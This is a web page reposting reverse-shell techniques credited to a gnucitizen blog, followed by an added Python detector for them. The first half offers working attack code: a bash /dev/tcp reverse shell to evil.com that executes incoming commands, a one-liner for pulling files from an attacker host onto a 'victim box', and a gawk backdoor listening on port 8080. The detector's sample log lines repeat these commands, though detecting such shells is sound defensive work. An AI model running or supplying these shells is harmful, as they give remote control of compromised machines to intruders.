============================================
www.techgaun.com
Reverse shell examples from http://www.gnucitizen.org/blog/reverse-shell-with-bash/ including those from comments
www.techgaun.com
============================================

Although netcat is very useful, and you may have to use it in most cases, here is a simple technique which emulates what netcat does but relies on bash only. Let's see how.

In step one we start a listening service on our box. We can use netcat, or whatever you might have at hand.

    $ nc -l -p 8080 -vvv

On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.

    $ exec 5<>/dev/tcp/evil.com/8080
    $ cat <&5 | while read line; do $line 2>&5 >&5; done

-------------

Transfer a file using HTTP:

Say you have compromised a victim box and want to transfer a file to the victim.

1. Put the file in the web root of the attacker box (I'm thinking of the web server in backtrack).
2. Start up the web server on the attacker box.
3. On the victim box do:

    (echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<> /dev/tcp/AttackerIP/80 \
      | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > local_filename

The subshell on the right discards the response headers up to the first blank line, then copies the body into local_filename.

Credit where credit is due: http://www.pebble.org.uk/linux/bashbrowser

-------------

Reverse shell in gawk (posted by macubergeek)

    #!/usr/bin/gawk -f
    BEGIN {
        Port = 8080
        Prompt = "bkd> "
        # gawk special file: /inet/tcp/LOCALPORT/REMOTEHOST/REMOTEPORT.
        # A non-zero local port means gawk listens; 0/0 accepts any peer.
        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
            do {
                printf Prompt |& Service          # |& is gawk's two-way coprocess operator
                Service |& getline cmd            # read one command line from the peer
                if (cmd) {
                    while ((cmd |& getline) > 0)  # run it and stream its output back
                        print $0 |& Service
                    close(cmd)
                }
            } while (cmd != "exit")
            close(Service)                        # drop the peer, then wait for the next one
        }
    }

Credits to all original authors (pdp & macubergeek)
www.techgaun.com
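As an added example, not from the original page or its authors: a small detector for the primitives shown above, run over constructed command-audit lines. The "timestamp host prog[pid]: command" line shape, the pids and the RFC 5737 documentation-range addresses are all assumptions made up for this example. The practitioner point it encodes is that bash resolves /dev/tcp and /dev/udp inside the shell, so no file is ever opened and file-access monitoring sees nothing; the evidence lives in logged command lines (or in network telemetry), and a descriptor bound by `exec N<>` being reused by a later command of the same shell is the strongest signal.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample lines in a generic "timestamp host prog[pid]: command" shape,
# not the record format of any particular audit tool. Addresses come from the
# RFC 5737 documentation ranges. The commands mirror the ones shown on this page.
SAMPLE_LOG = [
    '2024-01-01T10:00:01 host1 bash[1234]: exec 5<>/dev/tcp/192.0.2.10/8080',
    '2024-01-01T10:00:02 host1 bash[1234]: cat <&5 | while read line; do $line 2>&5 >&5; done',
    '2024-01-01T10:00:05 host1 bash[1301]: ls -la /var/www',
    '2024-01-01T10:01:10 host1 gawk[1402]: BEGIN { Service = "/inet/tcp/8080/0/0"; printf "bkd> " |& Service }',
    r'2024-01-01T10:02:00 host1 bash[1500]: (echo -e "GET /tool HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<> /dev/tcp/198.51.100.5/80',
]

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>\w+)\[(?P<pid>\d+)\]: (?P<cmd>.*)$")

# bash handles /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT in its redirection code:
# no file is opened, so the command line itself is what a detector has to inspect.
DEV_NET_RE = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d{1,5})")

# "exec N<>/dev/tcp/..." leaves the socket open as descriptor N for later commands.
EXEC_FD_RE = re.compile(r"\bexec\s+(?P<fd>\d+)<>\s*/dev/(tcp|udp)/")

# gawk special files: /inet/tcp/LOCALPORT/REMOTEHOST/REMOTEPORT.
# A non-zero LOCALPORT means gawk listens; "0/0" on the remote side accepts anyone.
GAWK_INET_RE = re.compile(
    r"/inet[46]?/(?P<proto>tcp|udp)/(?P<lport>\d+)/(?P<rhost>[\w.\-]*)/(?P<rport>\d+)"
)


@dataclass
class Finding:
    pid: str
    kind: str
    detail: str
    line: str


def scan(lines):
    """Flag bash /dev/tcp|udp redirections, gawk /inet sockets, and later commands
    of the same pid that read from or write to a descriptor bound by exec."""
    findings = []
    socket_fds = defaultdict(set)  # pid -> descriptors pointed at a socket via exec
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m:
            continue  # not in the expected shape; a real pipeline would count these
        pid, cmd = m["pid"], m["cmd"]

        for d in DEV_NET_RE.finditer(cmd):
            findings.append(Finding(pid, "bash-dev-net", f"{d['proto']} {d['host']}:{d['port']}", raw))

        e = EXEC_FD_RE.search(cmd)
        if e:
            socket_fds[pid].add(e["fd"])
        else:
            # A subsequent command in the same shell using <&N / >&N on a socket
            # descriptor is the read/execute/write loop half of the technique.
            for fd in sorted(socket_fds[pid]):
                if re.search(rf"[<>]&{fd}\b", cmd):
                    findings.append(Finding(pid, "socket-fd-reuse", f"fd {fd} used by: {cmd}", raw))

        for g in GAWK_INET_RE.finditer(cmd):
            if g["lport"] != "0":
                role = f"listening on {g['lport']}"
            else:
                role = f"connecting to {g['rhost']}:{g['rport']}"
            findings.append(Finding(pid, "gawk-inet", f"{g['proto']} {role}", raw))
    return findings


def pids_with_shell_channel(findings):
    """Pids where a socket descriptor was opened and then reused by another
    command: strong enough for an alert rather than a hunt query."""
    opened = {f.pid for f in findings if f.kind == "bash-dev-net"}
    reused = {f.pid for f in findings if f.kind == "socket-fd-reuse"}
    return sorted(opened & reused)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"pid={f.pid} {f.kind}: {f.detail}")
    print("shell-channel pids:", pids_with_shell_channel(scan(SAMPLE_LOG)))
```

A single /dev/tcp hit is a hunt lead (scripts legitimately use it for port checks), while the exec-then-reuse pairing and a gawk service with a non-zero local port are worth alerting on; the gawk pattern is reported as listening or connecting so the two cases can be triaged differently.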